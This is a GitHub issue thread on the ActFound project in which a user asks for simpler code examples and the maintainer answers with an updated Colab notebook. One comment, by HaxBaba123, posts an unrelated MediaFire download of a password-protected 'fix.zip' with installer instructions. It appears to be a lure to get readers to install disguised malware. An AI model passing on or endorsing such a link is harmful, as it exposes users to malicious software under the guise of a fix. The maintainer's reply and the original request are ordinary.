### ISSUE TITLE
 Simplify code examples for easier use？

### ISSUE THREAD

**Issue by asmalldream** [BFeng14/ActFound#4]
Great project, but the code examples are quite complex and hard to follow, even for computers . Simplifying the examples or adding more straightforward documentation would make the project more accessible and user-friendly.

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BFeng14** [comment]
Hi~ I have updated the colab programming tool for more easy usage, now you can simply fine-tune and make activity prediction on your own data. BTW, I also provide a metric (first step loss) to help you predict if Actfound can work well on your data. Please let me know if you have any further questions.

https://colab.research.google.com/drive/1zn3U3xwLXZjZQYGVgtxCiEwt1hkho62l?usp=sharing
